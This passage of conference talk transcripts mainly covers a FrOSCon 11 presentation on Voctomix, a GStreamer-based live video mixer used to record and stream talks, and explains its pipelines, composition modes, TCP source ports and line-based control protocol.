actual harvesting of the data from them. And when I said we have the ticket system directly in our application, that was also originally the JIRA ticketing system. In the end, we put our tickets on GitHub because we no longer use JIRA. And in that case, people needed to have GitHub accounts to create the issues. But those three who were still creating issues when the project was basically over, they kept doing that as well. But it was a hard process. Also, in the beginning, when they were forced to use SVN, well, they did it. And they were manually encoding XML files. So when I joined the project, I learned that we had historians who had no idea what they were actually trying to do with those XML files or why. They were just being told: well, it has to be this XML file.
It has to be this standard. And then you have this validator. Well, and then things happened like ignoring validator warnings, like: you can only have one ID. Yeah, thank you. Go ahead.
|
Distributed Research Infrastructures are built to support scholars from various disciplines in their work. In the case of CENDARI, a toolset aimed at historians has been developed with support by the European Comission. We will explain how popular open source solutions like Jenkins and Puppet have been employed in building the infrastructure, which is composed of open source applications, both existing and specifically developed.
|
10.5446/32448 (DOI)
|
Welcome to the afternoon sessions of FrOSCon 11. We are starting pretty much on time with Voctomix, a tool that is also used here at FrOSCon itself, namely to produce all the streams and recordings. MaZderMind is, in this case, really the mastermind behind the software. He will now explain the software a bit, say a bit about himself and about the requirements, and he will do the whole thing in English, so that people internationally can also see what is being done here at FrOSCon to make all the streams work and to get everything recorded. The stage is yours, MaZderMind. Hi, thank you. Thank you very much. As you said, I'm MaZderMind. I'm part of the C3VOC. We are doing conference recordings, especially at the Congress, but also at some smaller conferences and at FrOSCon, of course. And yeah, I would like to talk to you about Voctomix. Voctomix is our live vision mixer, or live video mixer, as we call it. And it's specially designed around the needs of the C3VOC, but I'm sure it will suit a lot of use cases of talk recordings. But yeah, we designed it around the needs of our use case. And as you may have seen, you're sitting inside of one of our setups. Back there is the camera. We have a mixer operator there, a frame grabber here, the projector and audio systems here. And a lot of stuff around here. And because it's so much, I would like to talk you through some of the pieces and parts that are part of our setup, that together form the requirements we have for our vision mixer and that in the end formed what Voctomix is. I will just talk about the core system, Voctomix, and the presentation mixing. We have a whole pipeline after that for post-processing and encoding. And last year there was a pretty nice talk from Peter and Meiser, and you can watch that on media.ccc.de; there you can see all the remaining pieces of our pipeline, which are also awesome. So in the beginning there is a camera and there is the public. And we want to transport the video of the camera to the public. It's simple. But maybe there is another camera, and maybe there is a speaker, and maybe there is audio. Yeah, of course. And maybe there is also some playout, like the confidence screen I have here, where I see my slides. And of course we want recording too. Because just streaming to the public is good, but having it recorded for later use is even better. But there are not always talks. Sometimes there is nothing in the room. And we do not want to stream an empty room. Or even worse, people standing somewhere here and having a chat, and we are streaming that live to the internet. That wouldn't be good. So we might need some kind of pause or break loop that we send out when there is no talk. And if it's just video, people will think, hey, my speakers are broken. So we need some kind of music source. And yeah, there are presenters and there are projectors. And we want to maybe show the slides there. But maybe we also want to show the cameras there. If speakers present hardware or something on the stage and it is small, you might want to see it here. And there are also some things we were not really thinking about at first: what else could we do if we have all this video information in one system? Where else can we stream it to? Maybe we deliver it to another room if the room gets full or something. So in the middle, there is the presentation mixer.
And it's what combines all these inputs and outputs and puts the right things in the right places to the right times. But we are not the first one to do this. Are we? No. So there is professional hardware. There is things you can buy that just work. Maybe. So, buy them, you switch them on and you pay around 2000 euros for such a device. But it's just a device. It doesn't have controls. So you need a control panel, which costs you around 5000 euros. Or you need software, which is not so easy to use because it looks like this. And you have to use it with a mouse. And it's not easy and it has a lot of buttons and it has a lot of functions. And people who were doing video mixing on the Congress know that we tape most of these Buttons because you can accidentally hit them and then the world burns. So we have another idea of what we want to do. We want our solution to be open source. It should be as open source as possible. And it should be software. Why should it be software? We could also design hardware. Well, we want to run it on commodity hardware. You should be able if something breaks around here. If the notebook behind there goes poof. We can go to the next conhardt and buy a new notebook or maybe borrow yours and have it running within half an hour. And we have a running room setup. We want to have it on commodity hardware so we can expand easier. We can just say, okay, you have a fast computer, bring it over, we will use it. It's no problem. And we want it to be replicable. For two reasons. First reason, something might break. As I said, if one of our main encoder systems die, because the power brick is gone, we can go to the next conhardt and just buy a new power brick and put it in there and it will work because it's just a PC. It has some special hardware, but in the end it's just a PC. And it should be replicable so that other groups can replicate what we are doing without buying special hardware that they may just not need in another year. So we have, for example, talked a lot to people in Australia, to the Picon Australia group or to the Linux Connau people. And they said, hey, we like your setup. We have built the same thing here. So on the other side of the world, people replicated our setup. And that's pretty, pretty cool. And that's what we want to do. And that's because it's the reason we want to use software to do that. So if you're looking into how to do live video mixing or live vision mixing in software on Linux, there are a few options. There's SlipRV, FFM-Pack, and of course, there's GStreamer. And GStreamer seems, on the first view, like a perfect fit. It has a lot of the functionalities we need already, existing. It is modular. It is plug-alive. We will take an in-depth look to GStreamer in a second. It's modular, you can take a piece out and put another piece in. And it's a completely different thing. It runs maybe on the GPU or on some specialized hardware, but the inputs and outputs are the same. You can just replace any component with other components. And we use GStreamer as the basis, as the framework to build Voktomics. And because it is so important to know how Voktomics is built, because in the end it's not that complicated, if you take a look at it, I want you to go with me on a ride and we will step through how Voktomics is constructed in the inner, with a not so in-depth, but a look that should give you an idea how you can modify it, if it doesn't work for you. So to do that, let's take a look at GStreamer. 
GStreamer is a pipeline-based multimedia framework. So they say. You build a pipeline, like something goes in, and it goes through some filters, and it goes out again. Here we see a video test source. It generates a test video. Then there is an image sync in the end, which puts it to the X-server. And in between I have a filter that says, okay, I will only let pass video that is this high and this wide. So what now happens is that GStreamer tries to negotiate between the source and the sync. It tries to find a format that both parties are capable of handling and that satisfies the filter requirements in between. So video test source will say, oh, I can produce a video in any resolution you want. And X-Image sync will say, oh, I can take nearly any resolution you want, maybe up to 4,000 by 4,000 pixels. So GStreamer knows, okay, I can now produce any resolution I want up to 4,000 by 4,000 pixels. And then it tries to apply the filter on it and says, okay, I now have to restrict the possibilities to those given values. But I have freedom in other things. Like, for example, will I send RGB data or will I send it in the other way around, blue, red, green, or blue, green, red? So it's up to those both systems to decide which they can produce and which they can accept. Also I'm not making a statement about the frame rate. So video test source will say, okay, I can produce every frame that you want, but I would prefer 25. And GStreamer tries to negotiate between the source and the sync and find a way to satisfy all needs. And if it can't, it will fail. And if it can, it will build your pipeline and start it. And the pipeline is basically a threat where the source gives the timing. Video test source produces frames into speed at things it should. And the frames are running through the pipeline to other elements. Video test source could produce frames as fast as it can. But XimgStream says, okay, I have a screen and my screen is running at 60 frames, so I can consume 60 frames. And it will only take as many frames as it can. And just as with Unix files, the slower sync does backfrager the source. And the source starts to run just as fast as it needs to to satisfy the requirements of the sync. That is a little complicated if we talk about. But in most cases will just work. You set the source, you set the sync, and it just works. The GStreamer does the hard things for you, all the negotiation in between. To take a look at all the things I just said, here is the introspection of the video test source plugin. We see all the formats it can produce. Multiple video formats. There's RGBX, like a bit red, a bit green, a bit blue, and a bit padding to align to 32 bits. There are video style formats, which are not RGB, but another color space. And the list is long. And it also can produce video from one pixel up to some big number. And it also can produce nearly any frame rate you want. So this is just what I said. GStreamer will need to negotiate between all these capabilities and all these properties of a video stream. Let's take a look at a little more complicated pipeline. I now have two sources. There's the video test source. And there's an audio test source. Now I have two independently running sources, both produce video and audio. I now have two pipelines running, basically. And in both pipelines, there are multiple constructs. But let's talk through that from the bottom up. But because it makes it easier, let's take a look at this element. It's a MOOCs. 
It takes multiple inputs and arranges them into a single stream. In this case, it makes an mp4 file. It takes multiple streams, and it puts them into an mp4 file. We have two encoders here. 264 encoder and mp3 encoder. So each of the sources, we put them through an encoder, and they take raw audio on the in or raw video and put encoded video out on the outside. And we take these two halves and put them into the MOOC and we get a working mp4 file in this case. But there are multiple elements here that I didn't talk about. There are these Q elements. And the reason for that is that we are actually building threads here. Each of these sources is an independently running thread. And the MOOC needs to synchronize between them. So what will happen is, let's say, the MOOC says, OK, I need one second audio for one frame. Maybe it is like that. So the audio test source will produce one audio sample. And the video test source will produce one frame. And the MOOC says, OK, I can't do anything. I have enough audio samples. So the audio test source will try to wait until the MOOCs can take the samples. But the MOOCs says, OK, I can't do anything. Please go on and continue. I have to wait until the video frame is there. So they both block each other because they're waiting for each other, because they don't run in the same speed. The audio source runs 48,000 times a second. And the video source only 25 times a second. So I need a way to adapt these two speeds. And this is what the Qs are for. They are essentially thread boundaries. So everything before the Q is a thread. And everything after the Q, like the MOOC, is a different thread. And because of the setup, all three things can run as fast as they want. And the Qs try to accomplish this back pressure and say, OK, please don't run too fast. But I have to give the data on to the MOOC. And this is one of the complicated things in G-Streamer. This is where it doesn't just work or it doesn't always just work. You plug your sources and your encoders and your MOOCs together and expect it to work and it doesn't. It just blocks. And they say, OK, I can't write file. The time is just not incrementing. And the reason is that you have to have in mind what happens underneath and that it builds these threads for you and they are blocking each other. And then there's another thing that you need to think about. It's this iOS on shutdown. It's also new. And what it does is it tells that when you kill this running program, you can take this Kombatlinen and run it on your Linux computer and it will produce you a nice mp4 file. But if you kill it, usually what happens is it kills all threads. But the problem is that the mp4 is then broken. It doesn't work. Because an mp4 has in the start of the file an index. And in order to be able to write that, it needs time to do this. So what we now enforce is that when you kill the program, it sends an end of stream signal through the pipeline and tells everything, okay, your inputs are now dead, please finish your work. And it's another thing that you have to know. And if you don't know it, you might wonder why. Because maybe sometimes the file works and sometimes it doesn't. So to take you a little deeper into the rabbit hole, I have basically now on the screen what is Voktomix in its inner core. It's video sources. And it's a compositor. Compositor is a special element in G-Streamer that allows you to aggregate multiple video streams on top of each other and beneath each other. 
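Before we get to the compositor, here is a minimal sketch in Python of the kind of pipeline just described: two live test sources, queue elements as thread boundaries, two encoders, an MP4 muxer, and an EOS sent on shutdown so the muxer can finish writing the file. This is plain GStreamer through PyGObject for illustration, not code taken from Voctomix; the caps values are arbitrary examples, and the element choice (x264enc, lamemp3enc, mp4mux) is one plausible combination among several.

    #!/usr/bin/env python3
    # Sketch of the testsrc -> queue -> encoder -> mp4mux -> filesink pipeline
    # discussed above. Not Voctomix code, just plain GStreamer via PyGObject.
    import signal
    import gi
    gi.require_version('Gst', '1.0')
    from gi.repository import Gst, GLib

    Gst.init(None)

    pipeline = Gst.parse_launch(
        "videotestsrc is-live=true "
        "  ! video/x-raw,width=1280,height=720,framerate=25/1 "
        "  ! queue ! x264enc ! mp4mux name=mux ! filesink location=test.mp4 "
        "audiotestsrc is-live=true "
        "  ! audio/x-raw,rate=48000,channels=2 "
        "  ! audioconvert ! queue ! lamemp3enc ! mux. "
    )

    loop = GLib.MainLoop()

    def on_sigint():
        # Do not just kill the process: send EOS so mp4mux can write its index,
        # otherwise the resulting file is broken.
        pipeline.send_event(Gst.Event.new_eos())
        return GLib.SOURCE_REMOVE

    GLib.unix_signal_add(GLib.PRIORITY_DEFAULT, signal.SIGINT, on_sigint)

    bus = pipeline.get_bus()
    bus.add_signal_watch()
    bus.connect("message::eos", lambda bus, msg: loop.quit())
    bus.connect("message::error", lambda bus, msg: loop.quit())

    pipeline.set_state(Gst.State.PLAYING)
    loop.run()
    pipeline.set_state(Gst.State.NULL)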
And like here, we are positioning it 50 from the top and scaling it to a special size and also setting some alpha channel. And compositor will build for you an image, like applying other sources on top of each other. And this is basically the only element that Voktomix is in the core. It's just a compositor for the video and we have a similar element for the audio. And everything around is just to support this one pipeline. So we are using here some video test sources with different patterns so we can see which source is which and they don't look both the same. And we have this compositor I just talked about, which aggregates these video streams. And it's exactly, that's nearly exactly the pipeline that's running in Voktomix. But there's one problem here. When we look at this slide, it's still one process. Okay, it has two queues so there are three threads running, but it's still one process. What happens if one of these sources gets terminated? It's a video test source, it won't get terminated, but if it's a real world source, what happens then? Sources are unreliable. So, because we are now coming back from the G-Streamer into the real world, we have things like cables and we have people who unplug them. And there are power plugs and there are people who think, oh, I might charge myself on here. Who does need a camera? And another thing is that in a room like this, the requirements may change. Maybe someone says, okay, I have hardware here to show and we need a new camera here. And then we just plug one out in the other room and take it here and install it here and drive a cable back. But after the talk, we will maybe move the camera back. So, there is naturally changes in the setup we are running. You can't rely on the sources to be there. Sometimes there's network in between and network is unreliable, of course. And G-Streamer, and especially a single G-Streamer Pipeline is a static construct. You set it up, you start it and then it runs. And if one thing of this pipeline has a problem, then the whole pipeline and the whole G-Streamer process will be terminated. And there are possibilities for dynamic changes. You can say, okay, I want to have a valve here and stop all data and then drain the end of the pipeline and then put another valve here and then cut out this piece of the pipeline. You can really think of it like a water pipeline system and then remove this piece and put a new one in and then refill the queues and then reopen this drain and then the rest of the pipeline will start. But doing this in a real-time situation where we have multiple cameras and someone just unpacked the camera and plugged it back is just not viable. It didn't work. I tried that, but it didn't work. It didn't work good enough to catch all these events and errors and all the places and put valves everywhere you need it. So, we need something different. If we have a setup like this, a source, a voctimix and then maybe recording or something else, we need something in between. We need a blocking barrier there, something that allows the camera to run on a different speed, maybe go away, maybe come back or have the core go away or maybe come back, run at a different speed, while both do not block each other. So, there are things in G-Streamer that allow you to do that. There are the inter-element. They are nice reusing them. Right now, they are running here. They are working like a clutch between the sources and the core. 
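Setting the inter elements aside for a moment, the following stand-alone sketch shows roughly what that central compositing pipeline looks like: two test sources feed a compositor, and the second one is scaled down and placed at an offset with an alpha value, similar to the picture-in-picture situation described above. Again this is illustrative PyGObject code rather than the actual core; the canvas size, the overlay position and the 25 fps frame rate are example values only.

    #!/usr/bin/env python3
    # Two test sources composited on top of each other: in essence the one
    # element the mixing core is built around. All sizes and positions here
    # are illustrative values, not the real Voctomix configuration.
    import signal
    import gi
    gi.require_version('Gst', '1.0')
    from gi.repository import Gst, GLib

    Gst.init(None)

    pipeline = Gst.parse_launch(
        "compositor name=mix background=black "
        "  sink_1::xpos=1280 sink_1::ypos=720 sink_1::alpha=0.9 "
        "  ! video/x-raw,width=1920,height=1080,framerate=25/1 "
        "  ! videoconvert ! autovideosink "
        "videotestsrc pattern=smpte is-live=true "
        "  ! video/x-raw,width=1920,height=1080,framerate=25/1 ! queue ! mix.sink_0 "
        "videotestsrc pattern=ball is-live=true "
        "  ! video/x-raw,width=640,height=360,framerate=25/1 ! queue ! mix.sink_1 "
    )

    loop = GLib.MainLoop()
    # Quit cleanly on Ctrl-C instead of relying on Python's default handler.
    GLib.unix_signal_add(GLib.PRIORITY_DEFAULT, signal.SIGINT, loop.quit)

    pipeline.set_state(Gst.State.PLAYING)
    loop.run()
    pipeline.set_state(Gst.State.NULL)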
And they are also working in the same way between the core and the things because things are also unreliable. There are spinning metal and spinning metal may crash or network may go down or something. And we do not want the core to terminate when one of the sources or things passes away. But the inter-element, well, yeah, they give a shit about time-stamping. So they are assuming that time is a linear thing and physics is perfect and every crystal in every device is running the same speed. And obviously, that is not true. So we have cameras and they drift and they drift with temperature and yeah, it basically screws up audio-video sync. And it really does this from the second you start them. But just a little, just a little until something happens. Like for example, you forget to stop an encoding process and your CPUs get overloaded and do more than they should. Then it audio-video drifts for minutes sometimes. So they are obviously not good. We do not want to keep using them. But currently, they are in Rock2Pics. And they are one of the biggest challenge we are facing because they are the main source for the sometimes little perceived instability that Rock2Pics has. So sometimes you have to restart it and restart it again. And they are one of the problems. So we started a rewrite a year ago. And it is a complicated thing because GStrummer internally is built with GObject. I do not know if someone of you have already touched GObjects. It is basically object-oriented programming in C. Which is basically not such a good idea. But okay, it is the format they are using. And then we are exporting these objects into Python. So it works. But we could use a little help there. It is really a thing of talking about how is the timing working. I have no background in these topics. It is all new to me. And I have to really turn my head around how timing is working. How first-in-ford, first-out-buffers could be working between processes and in-between queues. And I would really love to talk to somebody who has more background in these topics. So if you would like to talk about this, please come to me after the talk. And we will have a nice discussion. We have beer in the C3 Rock. So it will be a nice discussion, I hope. But for those who say, oh, this deep technical thing, the good news is you have it over. And we will now take a look into the fun stuff. Like how is Voktomics looking? What is it doing? And how can you use it in your alpha, in your, well, where you would like to record talks? So first, let's take a look at how people watching from the external side are seeing what Voktomics produce. So let's take a look on which composition modes we implemented. And you may say, hey, I know these Blackmagic devices or some other Vision Mixers. You can't produce any composition you want, and that's right. But you can't do with Voktomics. Vision Mix has a really small amount of variation it can give you in the result of your video. And this is one of the things we are shooting for, because we do not want, I'm sorry, we do not want the mixer engines to be able to screw up our video recording by falling asleep on the keyboard. And now the camera is right there, and most of the screen is empty. And we have seen that. We're moving around the video, like picture in picture, all over the slides, because hey, look, I can direct that. People have been doing that on Congresses. So we do not want them to be able to do such things. So we have a fixed amount of composition modes that we can produce. 
The easiest one is, for example, fullscreen. Just have a camera, maybe have a slide, maybe have a fullscreen. It's easy. Another thing we can do is picture in picture. Have a slide in big, and maybe a camera down below. Maybe have it at the other right round. If the speaker is talking really long and the slide is really boring, you might have the speaker in big, because he's interesting, maybe, and have the slides in small. Then we have views like this. It's one we use often, I think. It's one video in big, and one in small, and they both overlap a bit. You can configure them. You can say, okay, how big do I want this to be? How big should this be? How should it be placed? But it's a configuration option. You configure it when you start the Vokamix Core. The mixer angel is not able to change that. All your videos you produce will look the same, and we want that on a conference like this. We do not want one of the talks have this image here, and one have it in the middle, and then one above the logo that doesn't compute for us. So this is one of the views we use often. And then we also have this. If you can't decide which piece is more important, you can have them both equally sized. If this is not enough for you, and you say, okay, I want something more complex, I want three video sources in the same, okay, it's possible. It's just the compositor element that do this aggregation, and it can do two or three or five sources. But you have to change the code. It's not what Vokamix is made for. It's made to serve exactly what we need at the C3Rock. And that may be a problem for some of you. We'll say, okay, I want to do VJing, and I do not want this. I want something else. I would encourage you to take a look into the source code. It is not complicated. It's really, the amount of source code Vokamix carries, I would say that later again, is you can read it in a weekend, and completely understand what it does, from the beginning to the end, everything. And then you can change things. And in order to give you the possibilities to closer understand what Vokamix already does and what it, maybe you can do with it. The next thing I would like to look on with you is how we configured our inputs, our outputs, and how they are combined. So this is an excerpt of the readme. And I would like to talk you through some of the things here. The obvious things are audio-video sources. They are obviously in the middle. It's the main sources we have. It's a camera, maybe a second camera. It's the speaker slide input. This is the read your sources that are our content. And they both contain audio and video. Yeah, okay, the speaker, some of the time doesn't have audio, but sometimes they play audio back via hardme. And we want that to be part of our pipeline too. Then there is, it's like a block diagram. Then we have the mirror port, which basically gives you everything you get in out. But there is this inter-element in between. So you are assured that the mirror port will continue delivering video even if your source breaks away. So if you unplug the camera, you will get black video. And if you plug it back, the image will come back. Why is this important? We, for example, use this to make a backup recording, or we could use this, to make a backup recording of just the slides, to have a video recording of just the slides. Maybe this is useful. We could use that to have a stream with just the slides. 
But multiple view cameras, we talked about that on the Congress to have the ability, like in big football games, to change your view of the stage in real time in the website. You can use these parts to do stream encoding of audio input separately without the mixing angel interfering with the streams. Then we have these things. They have an asterisk, and they do not always exist. The reason for them to exist is because in our setup, and if you want to learn more about that, please take a look at the presentation that our team gave last year. The link is in the beginning of the presentation. We have two computers doing all this. We have one, which is running all the video inputs and the Voktor core and all the heavy lifting and all the encoding. And then we have this notebook. In between those devices, there is a finite bandwidth link. There is a gigabit link. And one HD video stream without compression is like 900 megabits. So one of them would saturate this gigabit link. And it obviously doesn't work to have all inputs sent to the notebook via a single gigabit link. So we have to compress them down on the Voktor core so we can send them over to the mixer notebook. And this is basically what these ports are, they are compressed down versions of the mirror port, which you can take, use to take a look onto what's coming in the Voktor core with your computer from the network. So then we have these main mixers. We took a look at the pipelines that run in this video mixer. It's basically a compositor. It's just that. It's some inter-element piping into compositor and piping out again. The audio mixer is basically the same. It can have multiple audio inputs and you could adjust the levels of all of them. But currently we're just selecting one with audio level 100% and every other channels are at zero. But you could use this to simulate like a small audio rack and say, okay, I want the speaker to be this loud and his audio from the notebook to be this loud and do it all in Voktor core. So next we have these sources here and you might have seen it in the slides before. If you combine video, there is sometimes a backdrop, some place where no video is. And yeah, you could just have it black, but it looks some kind of ugly. And we said we want to have a looping video in the background behind our small images placed on the canvas. So this is the place where you can play in this video. And when talking about this, one thing that might spring into your mind is, okay, Voktor Mix actually does not any kind of reading video files or writing them. It just merely accepts video from sources and sends them out. So even the background loop that you see behind the videos is produced by a third program running and piping the video data into Voktor Mix. And Voktor Mix is just doing the composition. There are reasons for this design. I will talk about that in a second because there are some other places where this gets important. Yeah, on the output, obviously there is our main output part. And there is basically the place where the mixed video and the mixed audio gets matched together and result in a final stream of all the mixed video and audio. And obviously there is the same encoder preview thing we had with the sources. And we have these things, the stream blanker. It's a feature that if you have made an video angel, you might have noticed you can say blank the stream. I talked about this in the beginning. If nothing is happening in the room, we do not want to stream an empty room. 
Or even worse, people running around here and having private conversations and because the microphone is lying on the desk, you have a live stream of them and it's not good. But on the other hand, if the mixer angel is asleep and he doesn't arrive and the speaker just begins talking, we do not want the recording to just show a still image. So we have built into Voktomix and it's another thing where you can see that Voktomix is really made for the situation we are in now. It's just made for this kind of recordings. We have the output part where our recording system is connected and then we have the stream blanker where our streaming system is connected. Und onto the stream blanker, you can either send the program view, the output view, or you can send another audio source or video sources. Because for example, you want to send a still image or a small animation that says nothing is happening in this room. Or you might want to send another loop that says something is happening, but we are not allowed to stream this. And maybe you want them to be different video loops. On the other hand, you might want to play some audio, some music. We have an audio loop, you might know that from the congresses, we basically play it everywhere. And these are the streams that are entering this video and audio source there. So to crunch it all together in some bullet points, the Voktor core only does the video mixing. It does nothing more. It does not encode. It does not decode. It does not stream. It does not have any sense of networking other than how it takes in its video inputs. And everything beside of that needs to be in other programs. So for example, sources and things are external scripts. There is a camera source. It is an FFM-Pack command running as a system D unit. And it reads from the Blackmagic grabber card and throws the reader to Voktomics. There is a slide source. It reads from this frame grabber here and throws the Voktomics. There is a recording sync. It takes Voktomics and codes it and writes it to files. And these are all separate processes. And most of them are not written by us. They are just configured. They are readily made programs like FFM-Pack. That just does that. And because of the setup, because of the separation of concerns, you have tons of options. You can say, okay, I do not want the recording to be made with FFM-Pack. I want it to be something else. I want that it is played out via HDMI. And then there is a hardware recorder. That is absolutely possible. You can do that. Or I want to stream it via SDI to another room and do the recording there. That is absolutely possible. You can do it whichever way you want. The Voktomics does not enforce the schema. And this is another thing that we actually plan when we are designing this. We want to be able to change things quickly. For example, here at Foscon in Room 7 and 8, we have a different frame grabbing setup. It is our beta test. If it works, we might roll it out in all rooms. So we are able to have two rooms be different configured than all the others while running the same software. Also the GUI is external. It can be on the same system, which needs obviously more CPU on the system. Or it can run on another computer, which also needs more CPU because you need to encode the video. But we are working on that. But having it on a notebook gives you more flexibility in placing things in the room. For example in Room 8, I think, our main encoder is somewhere underneath the speaker desk. And the mixer notebook is behind there. 
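To come back for a moment to the point that sources and sinks are just external programs: a source is simply something that connects to one of the core's TCP ports and pushes raw audio and video wrapped in Matroska into it. The sketch below fakes a camera with test sources. The host, the port number and the exact raw caps (resolution, frame rate, audio format) are assumptions and have to match whatever your core configuration expects, so check your config and the example scripts shipped with Voctomix.

    #!/usr/bin/env python3
    # A fake "camera" source: raw video plus raw audio, muxed into Matroska
    # and pushed into a TCP port where the mixing core is listening.
    # Host, port and caps are placeholders; adjust them to your core config.
    import signal
    import gi
    gi.require_version('Gst', '1.0')
    from gi.repository import Gst, GLib

    CORE_HOST = "localhost"
    CORE_PORT = 10000          # assumed source port, check your setup

    Gst.init(None)

    pipeline = Gst.parse_launch(
        "videotestsrc is-live=true pattern=smpte "
        "  ! video/x-raw,format=I420,width=1920,height=1080,framerate=25/1 "
        "  ! queue ! matroskamux name=mux streamable=true "
        f"  ! tcpclientsink host={CORE_HOST} port={CORE_PORT} "
        "audiotestsrc is-live=true freq=440 "
        "  ! audio/x-raw,format=S16LE,rate=48000,channels=2 "
        "  ! queue ! mux. "
    )

    loop = GLib.MainLoop()
    GLib.unix_signal_add(GLib.PRIORITY_DEFAULT, signal.SIGINT, loop.quit)

    pipeline.set_state(Gst.State.PLAYING)
    loop.run()
    pipeline.set_state(Gst.State.NULL)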
Here the mixer notebook is, I think, right beneath the camera. So both are just a meter away. You can place things in the room more easily if the GUI and the core are running on different systems with network in between. The numbers we just saw on this readme excerpt, these are actually TCP ports. And they take raw video frames, like just RGB, RGB, RGB, following byte by byte. Okay, not exactly RGB. We are using e420, some standard used in television, I'm not a television guy. And raw audio, like samples just in PCM encoding. And we place them into a Matroska container. And we do this because Matroska gives us timing information and metadata. It carries like how big are the frames? How many bytes will there be per frame and in which arrangement they are? And it gives us timing information. So, 10 does a frame match up with rich audio sample. But it's raw audio and raw video in Matroska in TCP. So it's like 800 megabits and we usually do it via loopback. So every source and sync is running on the same system and they're talking to each other via TCP loopback. Yeah, actually we should use Unix domain sockets there. Okay, got it. We will change that sometime. But using TCP and using this common format, it doesn't look that common, but it is, means that you can use VLC to watch your streams or FF Play or M-Encoder or any other Unix tool that is capable of reading Matroska and reading TCP. And if it doesn't use TCP, you can just use Netcat to send video and audio over. It's not a problem. We usually use Netcat to take a look at the video streams running on the encoder because it's just networking. It works. So to give some numbers, for the preview outputs we are currently doing JPEG encoding. We are just compressing every frame in JPEG and putting it together with the same 16 raw Lendian audio thingy in a Matroska container and sending it over to the GUI. And this is what the GUI shows. And if you are a video angel and you see some crystals, some snow in the GUI, this is from the JPEG encoding. But the recordings are usually much better quality. So now we have this core and it has sources and it has things and it has some understanding of its internal structure and it knows what we are doing with streaming and recording. But now we need a way to control it. So let's take a look at the control protocol, which you can speak to the Rock2Core to control it. And it's actually pretty simple. It's just a line-based TCP protocol. So you send a command like set videoA, camera1, and it responds with, okay, the video status is now camera1 and camera2. This is my R and this is my B port. Or you can say, okay, set the composite mode. So it's really easy to do actual mixing and you can easily do video mixing with Telnet. It's not a problem. It's like most of the time I'm testing. I'm using R, a rep, and Telnet and just writing the commands. But you can also cut remote via SSH. So we have situations where we are in the hotel and it's early and the first talk starts at like 8 o'clock and we are still nearly asleep. You can, of course, go down the lobby and while you're breakfasting, mix the talk. It's not a problem. It works. It's network. So you can, of course, cut via a mix via Netcat. And we are thinking, we have been thinking about implementing an HTTP layer. So we can actually have a web view of this. It's motionJPEG, so most browsers are able to show it and just open it in a web browser and have a Vokadoe there. That might be an interesting challenge for some of you to implement. 
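Because the control protocol is just lines of text over TCP, scripting it needs nothing more than a socket. The snippet below is an illustration, not an official client: the port number and the exact command verbs are assumptions based on the examples given above, so check the Voctomix README for the commands your version actually understands.

    #!/usr/bin/env python3
    # Minimal sketch of a scripted client for the line-based control protocol.
    # Port number and command names are assumptions; consult the README.
    import socket
    import time

    CORE_HOST = "localhost"
    CORE_PORT = 9999           # assumed control port

    def send_command(sock, command):
        """Send one command line and print whatever the core answers."""
        sock.sendall((command + "\n").encode("utf-8"))
        reply = sock.recv(4096).decode("utf-8").strip()
        print(f"> {command}\n< {reply}")
        return reply

    with socket.create_connection((CORE_HOST, CORE_PORT)) as sock:
        # Cycle the composite every five seconds, similar to the test script
        # mentioned later in the talk.
        modes = ["fullscreen", "side_by_side_equal", "side_by_side_preview"]
        for mode in modes:
            send_command(sock, "set_video_a cam1")
            send_command(sock, "set_composite_mode " + mode)
            time.sleep(5)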
And of course, it's scriptable. So during our tests, we had Vokamix running with a script, which changed the video mixing every five seconds. So we can test thoroughly all modes and all combinations. It's easy to script that. You can have an add task, which at 8 o'clock innev is the stream. It's not a problem. You can just line-based protocol. You can write your command, pipe Netcat, and be done. So let's take a look at the GUI. It comes so late in this talk because it's actually not important. I think it's really not that important, because it's just a thin wrapper around all the things, all the core things we just talked about. It has buttons for other modes, and it has video views. And that's it. And it's actually pretty shitty. So we are tweaking it every now and then a little bit, but I'm really not a user-interface guy. So if you would like to change that, the GUI is actually even smaller. It's maybe seven files or something, seven Python files. So if you want to change that and build your own GUI, it's easy. And the protocol is really simple, and all the communication stuff is already implemented. So looking into the future and the current state. Hopefully we'll get there. But until then, just a small list where we actually used Voktomics. We have a ton of conferences where we were and use Voktomic successfully. I hope none of them were a legacy TV switch, but I think they were all made with Voktomics. And yeah, obviously you are just in the middle of the biggest setup we have done so far with eight rooms. It's the biggest thing in the year. It's even bigger than in Congress. But as I told a little bit, we have also some connections to Australia, and they are running two conferences, and also Deppconf is planning to use Voktomics, and they were kind enough to package our software. So there are now packages in Debian and Ubuntu. I will talk about that in a second. But let's talk about the future plans. Well, I talked about it. I would really, really like to increase the stability and the reliability so that you just can turn it on and it works every time. It's not always like this. Sometimes it's ZEC falls on the startup, and you have to start it again, but then it works. But it's the thing where we need to work on. Dropping of slide sources is something. People are even in 2016 coming with four by three slides. Why? I don't understand that. We are producing all our videos in 16 by nine. So, I should know that. So, cropping the black borders would be a nice feature. Guy improvements, a good improvements, of course, I talked about that. A Flux compensator, like if someone forgets to turn off their screen reddening thing, the videos look really ugly, but it's actually, you could programmatically reverse this effect and recover the video. That would be a fun thing to work on. And it's a nice name for a feature. We want to increase the performance. We are running on i7 Intel CPUs, and the highest of them, like 4.2 GHz, and they have pretty much, they are quite loaded. But we have some things in the pipeline, like running video encoding on the GPUs, or doing more with OpenGL in terms of video format conversion and video compositing. But yeah, it's something we need to work on. Documentation is the thing. We have pretty good documentation. There is step by step guys on how to set them up. There are go to links for packages to download and just install. I think it should be not too hard to install it, but it always can be easier, especially putting your own sources into place. 
And yeah, the first impression that you have when installing it is currently not that good. You start it and it's all black because you have no sources, and then you need 20 scripts to put data in and out until you have a working setup. And we need to make that better. So some kind of installer who ask, hey, do you want some default setup? Should I install example sources for you? That would be pretty great. And it's also a good way to learn how the system works. If you want to do that, I would really appreciate that. So talking about what you can do. Well, there's code and it's Python. And it's there. And it's public and you can take a look at it. And I said it's really easy to read, I think. I try to keep it clean. I try to keep it structured. And the amount of code should be readable in a weekend, I think. There are three big parts. There's the core, which does all the video mixing. There's the GUI, which is pretty small, I showed it. And there are the example scripts. And the example scripts are really examples. But they are basically 99% identical to what we are running here. So these work for us. They might work for you. They might maybe not work for you. But they are a really good starting point, I think. If you say, hey, okay, I want to run it. Right after the talk, what should I do? Well, the first thing is you need a pretty recent version of G-Streamer. Because they have fixed a lot of bugs in the recent versions. I would recommend Debian Stretch, SID, or Vili. All three have the right G-Stream packages right there in the repositories. And you can just install them and use them. If you do not want to run any of these and are not willing to build your own G-Streamer version, you can run a Docker container that we provide. And it should work. I don't know. Give it a try. And for most, for some distributions, there are actually packages. The Debconf people were kind enough to package them for Debian. And Ubuntu has taken one 